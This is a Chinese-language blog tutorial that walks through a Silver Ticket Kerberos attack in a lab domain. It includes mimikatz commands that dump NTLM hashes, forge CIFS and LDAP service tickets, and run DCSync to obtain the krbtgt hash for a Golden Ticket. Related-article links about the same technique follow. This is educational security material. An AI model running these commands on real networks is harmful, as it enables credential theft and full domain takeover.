白银票据的原理和使用
白银票据的原理和使用
- 白银票据(Silver Ticket)原理
- 白银票据的使用
服务账号是计算机名字+$用来管理服务的账号
白银票据(Silver Ticket)原理
白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务
- 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据低
白银票据的使用
控制了DC域控和域内主机WIN7
从域控获取基本信息
获取域名称
获取域SID值(末尾500代表是管理员)
获取服务账号的NTLM Hash
mimikatz sekurlsa::logonpasswords
域控下线,在WIN7伪造服务票据
此时WIN7无访问域控c盘权限
查看已有票据:mimikatz kerberos::list 或 powershell klist
清除已有票据:mimikatz kerberos::purge 或 powershell klist purge
伪造cifs服务票据:mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:cifs /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
访问域控c盘,只有访问目录权限
尝试获取krbtgt的NTLM Hash,获取失败,需要有ldap服务的票据
mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt
WIN7伪造LDAP共享服务票据
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:LDAP /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
再次执行mimikatz获取Hash命令,成功得到krbtgt的NTLM Hash
即可制作黄金票据
白银票据的原理和使用相关推荐
- 白银票据/黄金票据构造分析
大家最好在看这篇文章之前,去看下我写的那篇关于认证协议分析的文章:NTLM与kerberos认证体系详解 (下面所说的Server hash指的是服务端机器用户的NTLM hash) 我们的白银票据和 ...
- 一文了解黄金票据和白银票据
前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiw ...
- 网络安全之黄金票据,白银票据
前言:今天来给大家讲讲黄金票据和白银票据 Kerberos认证# 金票Golden ticket# 原理# 伪造金票的场景和所需条件# 利用方式# 银票SILVER TICKET# 原理# 伪造银票所 ...
- 「Active Directory Sec」白银票据和黄金票据
描述 白银票据: 即伪造的TGS.当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器.此过程不需要KDC的参与.但缺点是只能访问一个服务. 黄金 ...
- 哈希传递攻击/黄金白银票据
Q&A Q1:pth在什么情况下能成功.哈希传递受到什么限制.什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash ...
- 最浅显易懂kerberos认证和黄金白银票据
一.kerberos认证 图片来自互联网 一. 1.客户端账号用自己的密码哈希加密(时间戳.客户端.服务端等信息)发送给AS (身份验证服务) AS 收到后进行查找,确认有该账号后生成随机密钥1 2. ...
- Kerberos认证介绍及黄金票据和白银票据
学前介绍 LM协议: 早期SMB协议在网络上传输明文口令.后来出现LAN Manager 挑战和 响应 验证机制简称LM,很简单,容易被破解 NTLM: 微软提出的一种windowsNT挑战/响应验证 ...
- php源码 收据管理,黄金票据 白银票据 ms14068(示例代码)
黄金票据 黄金票据的条件要求: 1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot] 2.域的SID 值[AD PowerShell模块:(Get-ADDomai ...
- 域渗透之(白银票据利用)
前言: 上一篇文件里面,已经很详细的和大家介绍了kerberos协议认证的方式了,上次主要说的是黄金票据(伪造TGT),今天主要来和大家分析下白银票据(伪造TGS票据),稍后为大家介绍他们之间的区别. ...
最新文章
- Python之父退休,C语言之父与世长辞,各大编程语言创始人现状盘点
- centos文本查看及处理相关的常用命令
- 在mysql中会话变量前面的字符是什么_在MySQL中仅使用会话变量仅对字符的首次出现执行搜索/替换...
- ibatise 没有大于等于吗_农村房屋没有证等于违法建筑吗?下面三个时间点记住,小心被忽悠...
- 数学国里有座天才云集的“疯人院”
- 小程序Windows和linux,改进后的《自动显示天气预报》小程序(Linux和Windows环境都可以)...
- 从面试题中看Java的Reference(引用)
- AI绘画网站最全收集!!
- 色彩RGBA值写作代码
- Gateway整合Nacos前端请求报错404 NOT_FOUNT
- date 显示日期月份用英文缩写表示
- shit 环信 IM SDK IM SDK web
- 用Verilog实现串并转换
- 非线性光纤光学——光孤子5
- jQuery跳房子插件hopscotch
- Windows7系统助手
- 如何获取微信公众号文章ID?9步教你!
- 【MVSO影视程序源码】影视自动采集+魔改超强SEO+自定义苹果cms资源站接口
- Spring4 MVC Hello Wrold
- 雷电模拟器python编程接口_【Python实践】_接口模拟器
热门文章
- 第一张多米诺 微软黑屏来了
- 广东省计算机考试省考跟国考,2020广东省考和国考的内容一样吗
- 最新深度学习环境搭建:win10+Anaconda+PyCharm+python3.7+tensorflow-gpu1.15+keras2.3.1+CUDA10.0+CUDNN7.6.5
- 小单刷题笔记之迷宫(bfs)
- 淘宝tair--分布式 key/value 存储引擎
- unity Vector2 与 Vector3的转换
- 树莓派4B之Pc端Qgc地面站与Pixhawk飞控连接
- Two-Stage Sample Robust Optimization
- [Unity Mirror] Network Manager
- nohup,disown和的区别